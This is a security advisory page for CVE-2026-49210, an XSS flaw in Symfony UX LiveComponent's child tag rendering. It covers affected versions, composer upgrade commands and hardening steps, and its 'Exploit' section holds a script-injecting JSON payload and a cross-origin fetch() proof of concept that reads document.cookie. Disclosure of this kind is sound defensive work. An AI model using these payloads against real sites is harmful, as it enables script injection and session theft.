Symfony UX LiveComponent, Cross-Site Scripting (XSS), CVE-2026-49210 (Medium) -DC-Jun2026-505

By /

Listen to this Post

Symfony\UX\LiveComponent\Util\ChildComponentPartialRenderer::createHtml() interpolates the `$childTag` argument directly into the HTML output as a tag name, without escaping or validation. The value originates from client-controlled JSON (children

.tag</code>) parsed by `LiveComponentSubscriber` and propagated through <code>InterceptChildComponentRenderSubscriber</code>, so an attacker who can reach the Live Component endpoint can inject arbitrary HTML, including `<script>` tags, on any re-render of a Live Component that contains at least one child component.
In the default configuration, the Live Component endpoint is gated by an `Accept: application/vnd.live-component+html` request-header check that cannot be set cross-origin without a CORS preflight, so the issue is primarily a defense-in-depth gap. It becomes directly exploitable on applications that have relaxed CORS to allow this header from untrusted origins, or that have been pivoted from another same-origin XSS.
The resolution implements validation of `$childTag` against a strict HTML tag-name regex before interpolation, rejecting any value that doesn't match. Anything that wouldn't be a valid HTML tag is dropped before reaching the response. The patch is available for branch 2.x (and forward-ported to 3.x). Symfony would like to thank Pascal Cescon for reporting the issue and Hugo Alliaume for providing the fix.

<h2 style="color: blue;">DailyCVE Form</h2>

Platform: Symfony UX LiveComponent
Version: 2.8.0–2.35.0, 3.0.0
Vulnerability: XSS via child tag
Severity: Medium (CVSS 4.8)
date: 2026-05-29

<h2 style="color: blue;">Prediction: 2026-06-15 (patch available)</h2>

<h2 style="color: blue;">What Undercode Say</h2>

<h2 style="color: blue;">Affected Versions</h2>

[bash]
composer show symfony/ux-live-component
Vulnerable: >=2.8.0, <2.36.0 | >=3.0.0, <3.1.0

Version Check (Composer)

composer outdated symfony/ux-live-component
Check if current version is in vulnerable range

Verify Patch Applied

composer require symfony/ux-live-component:^2.36.0
or for 3.x branch:
composer require symfony/ux-live-component:^3.1.0

Exploit

An attacker can inject arbitrary HTML by crafting a malicious `children

.tag` value in the JSON payload sent to the Live Component endpoint:
[bash]
{
"children": {
"1": {
"tag": "script>alert('XSS')</script"
}
}
}

Since `ChildComponentPartialRenderer::createHtml()` interpolates `$childTag` directly into HTML output without escaping or validation, the payload is rendered as an executable HTML tag. The attack requires:
1. Reaching the Live Component endpoint – the attacker must be able to send requests to `/_components/{name}[/{action}]`
2. Component with child components – the targeted Live Component must contain at least one child component
3. Bypassing the Accept header gate – either via relaxed CORS configuration or via a same-origin XSS pivot

CORS Bypass Example (cross-origin):

fetch('https://target.com/_components/MyComponent', {
method: 'POST',
headers: {
'Accept': 'application/vnd.live-component+html',
'Content-Type': 'application/json'
},
credentials: 'include',
body: JSON.stringify({
children: { '1': { tag: 'script>alert(document.cookie)</script' } }
})
});

Protection

1. Upgrade to Patched Version

composer require symfony/ux-live-component:^2.36.0
or for projects using Symfony 3.x:
composer require symfony/ux-live-component:^3.1.0

Patched versions validate `$childTag` against a strict HTML tag-name regex and reject any non-matching value.

2. Verify CORS Configuration

Ensure your application does not relax CORS to allow the `Accept: application/vnd.live-component+html` header from untrusted origins.

3. Audit Same-Origin XSS Vectors

Since this vulnerability can be pivoted from another same-origin XSS, ensure your application is hardened against XSS in general.

4. Monitor LiveComponent Endpoints

Review access logs for `/_components/` endpoints for unusual patterns or unexpected payloads.

Impact

- Cross-Site Scripting (XSS) – arbitrary HTML and JavaScript injection into the rendered page
- Session Hijacking – theft of session cookies and user credentials
- Data Exfiltration – exposure of sensitive information accessible via the victim's session
- Privilege Escalation – enabling access to privileged services and functionality
- Defense-in-Depth Bypass – the Accept header gate is not a CSRF protection; it only provides defense-in-depth
- Exploitation Conditions – directly exploitable on applications with relaxed CORS or those pivoted from another same-origin XSS
CVE-2026-49210 was disclosed on May 29, 2026, with patches available in versions 2.36.0 and 3.1.0.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top